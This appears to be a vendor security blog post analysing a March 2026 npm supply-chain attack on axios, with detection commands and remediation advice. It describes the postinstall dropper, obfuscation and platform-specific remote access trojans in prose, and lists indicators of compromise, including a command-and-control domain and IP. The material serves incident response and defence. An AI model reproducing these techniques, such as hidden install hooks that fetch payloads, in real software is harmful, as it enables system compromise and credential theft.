Security
Mar 31, 2026

The Axios Compromise: What Happened, What It Means, and What You Should Do Right Now

A Compromised Maintainer Account, a Three-Hour Window, and 100 Million Weekly Downloads — Here's the Full Breakdown

Give me the TL;DR
The Axios Compromise: What Happened, What It Means, and What You Should Do Right Now
For Qualys admins, NES for .NET directly resolves the EOL/Obsolete Software:   Microsoft .NET Version 6 Detected vulnerability, ensuring your systems remain secure and compliant. Fill out the form to get pricing details and learn more.

On March 31, 2026, two malicious versions of axios — the JavaScript HTTP client with over 100 million weekly npm downloads — were published to the npm registry through a compromised maintainer account. For roughly three hours, anyone whose build system pulled a fresh install got more than they bargained for: a cross-platform remote access trojan capable of full system compromise.

The malicious versions (1.14.1 and 0.30.4) have been removed. But if your CI pipeline, dev machine, or build server ran npm install between 00:21 and 03:29 UTC on March 31, the damage may already be done.

Here's what happened, why it matters, and what your team should be doing about it today.

What Happened

This wasn't a typosquat. It wasn't a rogue dependency quietly slipping into a build. The attacker compromised the npm account of @jasonsaayman, the lead axios maintainer, and changed the account's registered email to an attacker-controlled ProtonMail address (ifstap@proton.me) — locking the legitimate owner out of account recovery. With full control of the account, the attacker published the malicious versions directly via the npm CLI, completely bypassing the project's normal GitHub Actions CI/CD pipeline, branch protections, and code review gates. The malicious versions have no corresponding git tags, commits, or release branches in the axios repository — they exist only on npm.

Rather than modifying any axios source code directly (which would be easier to spot in a diff), the attacker added a single new dependency to package.json: plain-crypto-js@4.2.1. That package had been purpose-built for this attack. A clean version (4.2.0) was published 18 hours earlier under a separate throwaway account, presumably to give it a brief, innocent-looking history on the registry.

When npm resolved the dependency tree and installed plain-crypto-js, it automatically ran a postinstall hook — node setup.js — and that was the entire entry point for the compromise.

How the Payload Worked

The setup.js dropper used two layers of obfuscation: reversed Base64 encoding with modified padding characters, plus an XOR cipher. Once decoded, the script fingerprinted the host OS and pulled a platform-specific second-stage payload from a command-and-control server at sfrclak[.]com:8000.

The payloads were tailored per platform:

  • macOS: A binary disguised as an Apple system daemon (com.apple.act.mond) that beaconed to the C2 every 60 seconds, accepted commands for arbitrary code execution, filesystem enumeration, and ad-hoc code signing to bypass Gatekeeper.
  • Windows: A VBScript downloader that copied PowerShell to %PROGRAMDATA%\wt.exe (masquerading as Windows Terminal) and launched a hidden RAT with execution policy bypass.
  • Linux: A Python RAT dropped to /tmp/ld.py and launched as an orphaned background process via nohup.

After execution, the malware cleaned up after itself — deleting setup.js, swapping the package.json for a sanitized version, and leaving node_modules/plain-crypto-js looking completely benign. If you inspected the directory after the fact, you'd find no trace of the postinstall hook.

This is not script-kiddie-level work. The attacker pre-staged infrastructure, used double obfuscation, built three platform-specific RATs, and implemented anti-forensic self-deletion. This was deliberate, planned, and operationally sophisticated.

Who's at Risk

The three-hour publication window is the critical constraint. You're most likely affected if:

  • Your CI/CD pipelines don't pin dependency versions and ran npm install (or bun install) on a schedule or on commit during that UTC window — especially pipelines that run overnight or in early morning hours.
  • You (or anyone on your team) ran npm install or npm update locally during that window and happened to pull 1.14.1 or 0.30.4.
  • Your project depends on @qqbrowser/openclaw-qbot or @shadanai/openclaw, which bundled the malicious dependency independently of the axios timeline.

If your lockfile was committed before the malicious versions were published and your install didn't update it, you're in the clear. The lockfile is what saved most people here.

How to Check Your Exposure

Check your lockfile:

# npm
grep -E '"axios"' package-lock.json | grep -E '1\.14\.1|0\.30\.4'

# yarn
grep -E 'axios@' yarn.lock | grep -E '1\.14\.1|0\.30\.4'

# bun (text lockfile, v1.1+)
grep -E 'axios' bun.lock | grep -E '1\.14\.1|0\.30\.4'

Check for the malicious transitive dependency:

npm ls plain-crypto-js
# or
find node_modules -name "plain-crypto-js" -type d

Check for indicators of compromise on machines that may have been exposed:

Indicators by Platform

Platform What to look for
macOS /Library/Caches/com.apple.act.mond binary
Windows %PROGRAMDATA%\wt.exe (PowerShell masquerading as Windows Terminal)
Linux /tmp/ld.py Python script
Network Outbound connections to sfrclak[.]com / 142.11.206.73:8000

If You're Affected: Assume Breach

This isn't a "patch and move on" situation. If any of your systems installed the compromised versions, the RAT was live, beaconing, and capable of executing arbitrary follow-on payloads. Treat it accordingly:

  1. Isolate immediately. Quarantine any system that ran npm install during the affected window.
  2. Rotate everything. Every credential on the affected machine — API keys, SSH keys, cloud credentials, npm tokens, GitHub tokens — should be revoked and reissued. Not rotated in place. Revoked.
  3. Look for lateral movement. Check logs for outbound connections to the C2 infrastructure. If the RAT had time to execute, assume the attacker had arbitrary code execution and may have moved laterally.
  4. Rebuild, don't clean. Do not attempt to remediate compromised systems. Rebuild from a known-clean snapshot or base image.
  5. Audit your CI/CD logs. Review build logs for the March 31 UTC window to identify every pipeline that may have pulled the affected versions.

If You're Not Affected: Harden Anyway

This is a good day to tighten your supply chain hygiene. None of these are new recommendations, but this incident is a useful reminder of why they matter.

Enforce lockfiles in CI. Use npm ci instead of npm install in your pipelines. npm ci installs exactly what's in the lockfile and fails if it doesn't match package.json. This single practice would have prevented this attack for any project with a committed lockfile.

Disable postinstall scripts where you can. Running npm ci --ignore-scripts in CI environments prevents lifecycle hooks from executing entirely. This would have stopped the dropper cold. The tradeoff is that packages requiring native compilation or other legitimate post-install steps will break, so evaluate this on a per-project basis.

Pin your dependencies. If your package.json uses caret ranges (^1.14.0), npm will happily resolve to 1.14.1 on the next install. Pinning to exact versions (1.14.0) or relying on a committed lockfile prevents silent upgrades.

Monitor for unexpected network activity from build environments. Build servers shouldn't be making outbound connections to unknown hosts. If yours are, you'll want to know about it — ideally before a three-hour window turns into a three-month dwell time.

Treat maintainer accounts as critical infrastructure. The root cause here was a compromised npm account. If your organization publishes packages, enforce 2FA, use publish-specific tokens with limited scope, and audit who has publishing rights regularly. If you're a consumer, know that the packages you depend on are only as secure as their maintainers' credentials.

The Bigger Picture

This attack follows a pattern that's becoming distressingly familiar. ESLint's Prettier plugin. The Shai-Hulud campaign that hit hundreds of packages. The recent LiteLLM compromise on PyPI. The playbook is consistent: gain access to a trusted account, publish a malicious version, and let the ecosystem's implicit trust do the rest.

What makes the axios incident stand out is the combination of scale and sophistication. Over 100 million weekly downloads means even a three-hour window represents an enormous blast radius. And the attacker didn't cut corners — pre-staged infrastructure, double obfuscation, platform-specific RATs, anti-forensic cleanup. This was a professional operation.

The uncomfortable truth is that the npm ecosystem (and package registries in general) still rely heavily on trust. Trust that maintainers' accounts are secure. Trust that dependencies haven't been tampered with. Trust that postinstall scripts do what they say. Every control we layer on top — lockfiles, SBOMs, dependency scanning, script auditing — is an attempt to verify that trust before it's too late.

No single tool or practice prevents every supply chain attack. But the organizations that fare best are the ones that stack defenses: lockfile enforcement, dependency scanning, runtime monitoring, restricted network egress from build systems, and a clear incident response plan for when (not if) something gets through.

One More Thing

At HeroDevs, we spend our days thinking about what happens when the software you depend on can no longer protect itself — and incidents like this reinforce why that work matters. If you're evaluating your supply chain posture or dealing with end-of-life dependencies that compound these risks, we're here to help.

Stay safe out there. Commit your lockfiles. And maybe go check your CI logs from last night.

Table of Contents
Author
Allison Vorthmann
Engineering Manager
Open Source Insights Delivered Monthly